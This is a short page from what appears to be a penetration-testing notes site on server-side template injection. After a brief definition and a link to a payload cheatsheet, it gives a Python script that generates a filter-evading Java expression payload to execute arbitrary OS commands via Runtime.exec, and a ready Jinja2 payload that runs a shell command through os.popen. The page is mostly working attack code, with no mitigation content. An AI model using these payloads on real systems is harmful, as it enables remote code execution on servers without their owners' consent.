Server Side Template Injection

Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages.

Cheatsheet:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md

Python script for Java encoder:

#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ').getInputStream())}'
print(poc)

Python SSTI RCE

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

PreviousCommand injection NextNoSQL injection

Last updated 2 years ago